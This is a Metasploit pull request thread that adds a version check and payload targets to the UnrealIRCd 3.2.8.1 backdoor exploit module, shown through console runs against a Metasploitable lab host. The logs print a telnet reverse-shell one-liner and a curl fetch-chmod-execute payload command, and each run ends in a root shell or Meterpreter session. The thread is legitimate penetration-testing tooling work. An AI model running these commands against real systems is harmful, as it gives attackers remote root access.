
Unreal_ircd_3281_backdoor: Add checks & targets#20952

Merged
bwatters-r7 merged 6 commits into rapid7:master from g0tmi1k:unreal_ircd_3281_backdoor
Feb 24, 2026

Conversation

@g0tmi1k
Contributor

@g0tmi1k g0tmi1k commented Feb 10, 2026

After

Setup:

$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/irc/unreal_ircd_3281_backdoor; options; show targets'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/unix/reverse

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command (Generic)



View the full module info with the info, or info -d command.


Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Unix Command (Generic)
    1   Unix Command


msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

Check:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > check
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: swqkly
    :irc.Metasploitable.LAN 001 swqkly :Welcome to the TestIRC IRC Network swqkly!swqkly@10.0.0.1
    :irc.Metasploitable.LAN 002 swqkly :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
    :irc.Metasploitable.LAN 003 swqkly :This server was created Sun May 20 2012 at 14:04:37 EDT
    :irc.Metasploitable.LAN 004 swqkly irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.Metasploitable.LAN 005 swqkly UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.Metasploitable.LAN 005 swqkly WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.Metasploitable.LAN 005 swqkly EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[+] 10.0.0.10:6667 - The target is vulnerable.
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

Target 0:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[+] sh -c '(sleep 3819|telnet 10.0.0.1 4444|while : ; do sh && break; done 2>&1|telnet 10.0.0.1 4444 >/dev/null 2>&1 &)'
[*] Started reverse TCP double handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] 10.0.0.10:6667 - Waiting for trigger
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo iXVXTfgtLX5424Iq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "iXVXTfgtLX5424Iq\r\n"
[*] Matching...
[*] A is input...
[*] 10.0.0.10:6667 - Done!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:60363) at 2026-02-10 20:33:24 +0000

id
uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.10 - Command shell session 1 closed.  Reason: User exit
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >

Target 1:

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set TARGET 1
TARGET => 1
msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, http, socks5, socks5h
   RHOSTS   10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    6667             yes       The target port (TCP)


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) >
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] 10.0.0.10:6667 - Waiting for trigger
[*] Sending stage (23408 bytes) to 10.0.0.10
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.10:60365) at 2026-02-10 20:33:55 +0000
[*] 10.0.0.10:6667 - Done!

meterpreter >
meterpreter > shell
Process 5385 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
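The check in this PR registers a throwaway IRC user and reads the server's registration replies for the version string, as the output above shows. The parser below is an added example (not the module's own Ruby code) that does the same classification offline over constructed sample replies modelled on that output: it splits each RFC 1459 message into prefix, command and params, pulls the version from RPL_YOURHOST (002) or RPL_MYINFO (004), and reports whether it is the affected Unreal3.2.8.1 release. The version alone only identifies the affected release, which is why the module reports "appears to be vulnerable".

```python
import re

# Constructed sample server replies, modelled on the check output quoted above.
SAMPLE_REPLIES = [
    ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...",
    ":irc.Metasploitable.LAN 001 swqkly :Welcome to the TestIRC IRC Network swqkly!swqkly@10.0.0.1",
    ":irc.Metasploitable.LAN 002 swqkly :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1",
    ":irc.Metasploitable.LAN 004 swqkly irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj",
]

# The release the module's check keys on (the only one distributed with the backdoored tarball).
AFFECTED_VERSION = "Unreal3.2.8.1"


def parse_irc_line(line):
    """Split one RFC 1459 message into (prefix, command, params); a trailing param is the last element."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    params = head.split()
    command = params.pop(0) if params else None
    if sep:
        params.append(trailing)
    return prefix, command, params


def extract_version(lines):
    """Return the server version from RPL_YOURHOST (002) or RPL_MYINFO (004), or None if neither was seen."""
    for line in lines:
        _, command, params = parse_irc_line(line.rstrip("\r\n"))
        if command == "002" and params:
            m = re.search(r"running version (\S+)", params[-1])
            if m:
                return m.group(1)
        if command == "004" and len(params) >= 3:
            return params[2]  # <nick> <servername> <version> <usermodes> <chanmodes>
    return None


def assess_banner(lines):
    """Classify a captured registration exchange the way the module's check does."""
    version = extract_version(lines)
    if version is None:
        return None, "unknown"  # no numeric reply seen, e.g. registration refused or throttled
    if version == AFFECTED_VERSION:
        return version, "appears vulnerable"
    return version, "not the affected release"


if __name__ == "__main__":
    print(assess_banner(SAMPLE_REPLIES))
```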

@bwatters-r7
Contributor

Note to self: check if payload selection works on this module

@bwatters-r7 bwatters-r7 moved this from Todo to Waiting on Contributor in Metasploit Kanban Feb 12, 2026
@g0tmi1k
Contributor Author

g0tmi1k commented Feb 14, 2026

Thanks for your time @dwelch-r7 & @bwatters-r7 !
Based on your input, I've done 4c5142e & 38e9595

@g0tmi1k g0tmi1k force-pushed the unreal_ircd_3281_backdoor branch from 4c5142e to f65dca1 February 20, 2026 09:02
@g0tmi1k
Contributor Author

g0tmi1k commented Feb 20, 2026

Just done a force push.

Result

$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/irc/unreal_ircd_3281_backdoor; check; run'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/linux/http/x86/meterpreter/reverse_tcp
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: romona
[*] 10.0.0.10:6667 - NICK romona
[*] 10.0.0.10:6667 - USER romona 0 * romona
    :irc.Metasploitable.LAN 001 romona :Welcome to the TestIRC IRC Network romona!romona@10.0.0.1
    :irc.Metasploitable.LAN 002 romona :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
    :irc.Metasploitable.LAN 003 romona :This server was created Sun May 20 2012 at 14:04:37 EDT
    :irc.Metasploitable.LAN 004 romona irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
    :irc.Metasploitable.LAN 005 romona UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
    :irc.Metasploitable.LAN 005 romona WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
    :irc.Metasploitable.LAN 005 romona EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[*] 10.0.0.10:6667 - The target appears to be vulnerable.
[*] Command to run on remote host: curl -so ./wCTrvPzx http://10.0.0.1:8080/w4fGVgXiKHSuZJ1djTweGw;chmod +x ./wCTrvPzx;./wCTrvPzx&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w4fGVgXiKHSuZJ1djTweGw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] Client 10.0.0.10 requested /w4fGVgXiKHSuZJ1djTweGw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:60114) at 2026-02-20 09:01:51 +0000

meterpreter >

@g0tmi1k g0tmi1k requested a review from bwatters-r7 February 20, 2026 09:03
@bwatters-r7
Contributor

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
                                      loit.html
   RPORT   6667             yes       The target port (TCP)


Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Lin
                                              ux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Acce
                                              pted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST                            yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      ITcxgSnPy        no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux/Unix Command



View the full module info with the info, or info -d command.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.5.132.178
rhost => 10.5.132.178
msf exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] 10.5.132.178:6667 - Connected to 10.5.132.178:6667
[*] 10.5.132.178:6667 - Sending IRC backdoor command
[*] Sending stage (1062760 bytes) to 10.5.132.178
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.178:40516) at 2026-02-24 09:11:52 -0600

meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: root
meterpreter > 

@github-project-automation github-project-automation Bot moved this from Waiting on Contributor to In Progress in Metasploit Kanban Feb 24, 2026
@bwatters-r7 bwatters-r7 merged commit 1e7b008 into rapid7:master Feb 24, 2026
18 checks passed
@github-project-automation github-project-automation Bot moved this from In Progress to Done in Metasploit Kanban Feb 24, 2026
@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Feb 24, 2026
@bwatters-r7
Contributor

Release Notes

Enhances the unix/irc/unreal_ircd_3281_backdoor module to increase payload options, including adding a native Meterpreter session, adds debugging logic inside the module, and adds more verbose output.

@g0tmi1k g0tmi1k deleted the unreal_ircd_3281_backdoor branch February 24, 2026 15:39
@g0tmi1k
Contributor Author

g0tmi1k commented Feb 24, 2026

Thanks @bwatters-r7 :D

@g0tmi1k g0tmi1k changed the title Unreal_ircd_3281_backdoor: Add checks & Targets Unreal_ircd_3281_backdoor: Add checks & targets Feb 25, 2026
@g0tmi1k g0tmi1k mentioned this pull request Mar 10, 2026